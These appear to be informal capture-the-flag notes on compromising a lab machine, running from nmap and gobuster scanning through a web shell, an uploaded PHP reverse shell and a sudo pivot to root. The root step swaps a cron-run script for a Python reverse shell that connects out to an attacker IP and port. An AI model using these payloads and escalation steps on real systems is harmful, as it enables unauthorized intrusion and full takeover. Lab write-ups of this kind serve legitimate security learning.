Nmap result:

80/tcp    open     http      Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
5488/tcp  filtered unknown
10459/tcp filtered unknown
11833/tcp filtered unknown
15168/tcp filtered unknown
27876/tcp filtered astrolink
37122/tcp filtered unknown
45155/tcp filtered unknown
53415/tcp filtered unknown

This made me believe that the port 80 is the only attack vector, maybe somewhere to upload malicious file?

Ran gobuster

gobuster dir -u http://10.129.165.204:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/images

/php

/uploads/

/dev/

clicking one of them took me to a web based shell.

PHP version -> PHP 7.0.22-0ubuntu0.16.04.1 (cli) ( NTS )

Upload a reverse shell (pentest monkey script) and go to the directory uploads/php-reverse-shell.php to activate it.

Try to run LinEnum on it (uploaded via python HTTP server & wget - no curl downloaded )

the shell was not accessible (tty not present) so I just used the python command to call it.

Once you get the shell, you can go into the script manager's bash

sudo -u scriptmanager bash 

there's text.py script that's running every min (run "date" & "ls -la" to confirm it)

replace it with the following script

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.109",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"]) 

How does it call root?

• because the text file was the root!